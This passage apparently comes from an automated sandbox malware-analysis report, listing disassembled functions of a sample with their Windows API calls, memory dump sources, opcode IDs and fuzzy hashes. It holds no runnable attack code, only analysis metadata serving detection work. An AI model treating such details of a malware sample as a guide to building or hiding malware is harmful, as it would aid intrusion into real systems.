                                Function 0045332B Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 269COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • RaiseException.KERNEL32(C000000D,00000000,00000001,000000FF,?,00000008,PkGNG,PkGNG,00453326,000000FF,?,00000008,?,?,004561DD,00000000), ref: 00453558
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExceptionRaise
                                • String ID: PkGNG
                                • API String ID: 3997070919-263838557
                                • Opcode ID: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                • Instruction ID: ef9cfcefdd20db456822e604066c987cb5d00f1002a97bdaec88d2537339d9b1
                                • Opcode Fuzzy Hash: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                • Instruction Fuzzy Hash: 40B16C311106089FD715CF28C48AB657BE0FF053A6F258659EC9ACF3A2C739DA96CB44
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00434C52 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                                Download Yara Rule
                                APIs
                                • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434C6B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: FeaturePresentProcessor
                                • String ID:
                                • API String ID: 2325560087-3916222277
                                • Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                • Instruction ID: b6e659610939bc40af268f25ffb2b9965a4fe426cdd66f7fc4435c5297b2c53a
                                • Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                • Instruction Fuzzy Hash: EE515471D002089BEB24CF69D9856DEBBF4FB48354F24956BD819EB350D378AA80CF94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044E879 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: .
                                • API String ID: 0-248832578
                                • Opcode ID: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
                                • Instruction ID: 28de479bcd0ee174bbf7ea2f8c467f6584cf945aa63ddb2e5cfeaaf716254919
                                • Opcode Fuzzy Hash: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
                                • Instruction Fuzzy Hash: 233106B2900149AFEB249E7ACC85EEB7BBDEF45304F1001AEE819D7291E6349D458B54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00451F9B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                • EnumSystemLocalesW.KERNEL32(004520C3,00000001,00000000,?,lJD,?,004526F0,00000000,?,?,?), ref: 0045200D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                • String ID: lJD
                                • API String ID: 1084509184-3316369744
                                • Opcode ID: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                • Instruction ID: 7d3ee128790e63e9d167a680a676634a6e0759605f9449bc3b94779c572ada63
                                • Opcode Fuzzy Hash: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                • Instruction Fuzzy Hash: E51125372007019FDB189F39C8916BABB91FF8075AB14482EEE4687B41D7B9A946CB44
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00452036 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                • EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                • String ID: lJD
                                • API String ID: 1084509184-3316369744
                                • Opcode ID: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                • Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
                                • Opcode Fuzzy Hash: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                • Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004488ED Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: InfoLocale
                                • String ID: GetLocaleInfoEx
                                • API String ID: 2299586839-2904428671
                                • Opcode ID: 2d8ab5e4c08eb423885d267f31dc3d21c73ce0c4a0b39471804a4927225e8e03
                                • Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
                                • Opcode Fuzzy Hash: 2d8ab5e4c08eb423885d267f31dc3d21c73ce0c4a0b39471804a4927225e8e03
                                • Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041DB62 Relevance: 2.8, Strings: 2, Instructions: 277COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: PkGNG$A
                                • API String ID: 0-652289354
                                • Opcode ID: 5bd247f65566e5dcac570d963c8fc58fd9122a78ba50124b87c8ae73a408a6cb
                                • Instruction ID: 79373b44a76dcf5e8091c0b891bec819a00bcae964dee749e010b71610d2b526
                                • Opcode Fuzzy Hash: 5bd247f65566e5dcac570d963c8fc58fd9122a78ba50124b87c8ae73a408a6cb
                                • Instruction Fuzzy Hash: F7B1A5795142998ACF05EF28C4913F63BA1EF6A300F4851B9EC9DCF757D2398506EB24
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0043DE9D Relevance: 2.7, Strings: 2, Instructions: 214COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 0$PkGNG
                                • API String ID: 0-1056914901
                                • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                • Instruction ID: b97fed3bff06dc01e1c808345b9e1576e5435f58d5e0cb17a963d6e43aa39459
                                • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                • Instruction Fuzzy Hash: C8516A21E01A4496DB38892964D67BF67A99B1E304F18390FE443CB7C2C64DED06C35E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00412077 Relevance: 2.6, APIs: 2, Instructions: 55memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37), ref: 004120E7
                                • HeapFree.KERNEL32(00000000), ref: 004120EE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$FreeProcess
                                • String ID:
                                • API String ID: 3859560861-0
                                • Opcode ID: bbc8ffc4057debe9872561f5e92b4f6919ce40f9ddced797a216f9a420f6d04b
                                • Instruction ID: eee285bae3a3c664d400e4c5f5e220380537cd22e0998a3ce94cd1697e41dfe3
                                • Opcode Fuzzy Hash: bbc8ffc4057debe9872561f5e92b4f6919ce40f9ddced797a216f9a420f6d04b
                                • Instruction Fuzzy Hash: 16112A32000B11EFC7305F64DE85957BBE9FF08715314892EE29696921CB76FCA0CB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00433946 Relevance: 1.8, Strings: 1, Instructions: 501COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 0
                                • API String ID: 0-4108050209
                                • Opcode ID: 1f1efbfc6b98b7ff63776831a751ef1758ce1d1abb45475947e68a2c5420a09b
                                • Instruction ID: aa2317f629b7fe23c078ec1ce6c5eb8ae6c7f7e5ba67e2b2e47e92e01b9ebfde
                                • Opcode Fuzzy Hash: 1f1efbfc6b98b7ff63776831a751ef1758ce1d1abb45475947e68a2c5420a09b
                                • Instruction Fuzzy Hash: A4126F32B083008BD714EF6AD851A1FB3E2BFCC758F15892EF585A7391DA34E9058B46
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0042739D Relevance: 1.7, Strings: 1, Instructions: 435COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: PkGNG
                                • API String ID: 0-263838557
                                • Opcode ID: c9aaf453693c51d24ca7a3c4a4ceab2933bddcf98470505b98e2a27e306b013f
                                • Instruction ID: c5d71c01a3a4c2ba568a1e95f45065819b1df519d68335ab1a8a94a68da0c1ef
                                • Opcode Fuzzy Hash: c9aaf453693c51d24ca7a3c4a4ceab2933bddcf98470505b98e2a27e306b013f
                                • Instruction Fuzzy Hash: 1002BFB17146519BC318CF2EEC8053AB7E1BB8D301745863EE495C7795EB34E922CB98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00426E0E Relevance: 1.6, Strings: 1, Instructions: 383COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: PkGNG
                                • API String ID: 0-263838557
                                • Opcode ID: 5962e5082cf13a8249de797b5eebe59d3637d4add307bccac64aa69d81196930
                                • Instruction ID: 4a18c9c21abf6ab3d0e9afb34562907cd60dbb70f6b305f111ae620774dcdf5c
                                • Opcode Fuzzy Hash: 5962e5082cf13a8249de797b5eebe59d3637d4add307bccac64aa69d81196930
                                • Instruction Fuzzy Hash: 42F18C716142559FC304DF1EE89182BB3E1FB89301B450A2EF5C2C7391DB79EA16CB9A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00452313 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$_free$InfoLocale_abort
                                • String ID:
                                • API String ID: 1663032902-0
                                • Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                • Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
                                • Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                • Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00452543 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$InfoLocale_abort_free
                                • String ID:
                                • API String ID: 2692324296-0
                                • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                • Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
                                • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                • Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00448404 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(?,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                                • EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                • String ID:
                                • API String ID: 1272433827-0
                                • Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                • Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
                                • Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                • Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00451F50 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                • EnumSystemLocalesW.KERNEL32(00451EA7,00000001,?,?,?,00452712,lJD,?,?,?,?,?,00444A6C,?,?,?), ref: 00451F87
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                • String ID:
                                • API String ID: 1084509184-0
                                • Opcode ID: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                • Instruction ID: 7090a925995da140c065d9916092b781359a33e81ca1c933e4536b6f4f09cf03
                                • Opcode Fuzzy Hash: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                • Instruction Fuzzy Hash: A7F0203674020597CB04AF75C809B6A7F90EBC272AB06009AEE058B662C7799842C754
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040F8D1 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                Download Yara Rule
                                APIs
                                • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,4.9.4 Pro), ref: 0040F8E5
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: InfoLocale
                                • String ID:
                                • API String ID: 2299586839-0
